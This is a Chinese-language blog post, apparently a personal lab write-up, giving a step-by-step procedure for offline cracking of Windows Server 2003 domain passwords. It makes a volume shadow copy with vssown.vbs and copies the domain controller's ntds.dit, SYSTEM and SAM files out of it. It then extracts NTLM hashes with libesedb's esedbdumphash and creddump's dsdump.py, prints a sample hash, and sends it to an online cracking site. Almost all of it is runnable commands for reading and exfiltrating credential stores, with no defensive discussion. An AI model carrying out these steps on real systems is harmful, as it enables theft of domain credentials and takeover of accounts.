標籤:c style blog a http tar
離線破win2003域帳號密碼
國內網站講了許多方法。把我實驗成功的經驗跟大家分享。
方法是按照tim的文章操作,連結如下:
http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
一實驗環境:windows server2003,域環境
搭建方法很簡單,百度搜搜。
準備工具:vssown.vbs,bt5,ntds_dump_hash.zip
vssown.vbs網上找
http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z
建立一個域使用者xiaocai,密碼設為 123abcABC
二win2003下提取檔案
1、將vssown.vbs拷到網域服務器上,比如拷到網域服務器的案頭。
2、以管理員身份運行cmd,執行以下命名:
cd 案頭
cscript //nologo vssown.vbs /start 啟用
cscript //nologo vssown.vbs /status 查看運行狀態
cscript //nologo vssown.vbs /create C 建立快照
cscript //nologo vssown.vbs /list 查看建立的快照資訊
這裡可以看到系統內部的路徑,將兩個ntds.dit和SYSTEM檔案複製到案頭,這裡的[X]用5代替。
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM
提取就檔案就結束了。這裡嘗試的時候經常失敗。有空再找找資料到底是什麼造成。
再把快照刪除(這步可選,建議刪除掉)
cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D}
把這3個產生的檔案複製出來。
三提取HASH
先下載工具,BT5,我是用下面這個虛擬機器鏡相
VMWARE鏡像32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z
預設登陸密碼:root/toor
開放ssh服務:(開啟服務後可以用Secure CRT進行訪問,方便傳檔案)
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
sshd-generate
/etc/init.d/ssh restart
略掉一個
用ifconfig查看IP
接著用Secure CRT訪問,
按ALT+P 開啟SFTP,把檔案傳到/tmp下
cd /tmp
put SYSTEM ntds.dit ntds_dump_hash.zip
切換到BT5系統標籤
cd /tmp
ls
#解壓 ntds_dump_hash.zip
unzip ntds_dump_hash.zip
#編譯libesedb
cd libesedb
chmod +x configure
./configure && make
#解釋資料檔案ntds.dit
cd esedbtools
./esedbdumphash ../../ntds.dit
#提取hash
cd ../../creddump/
python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable
提取出來了,找到,
xiaocai:1109:8A79528CCD6E0DBFFCD6B8DB0F458C37:3B0DE00581A39A49946206E0998B7DF7:::
四破解hash
破解hash方法很多,這裡採用網站破解。把加粗的那部分放到網站上去破解:http://www.objectif-securite.ch/en/ophcrack.php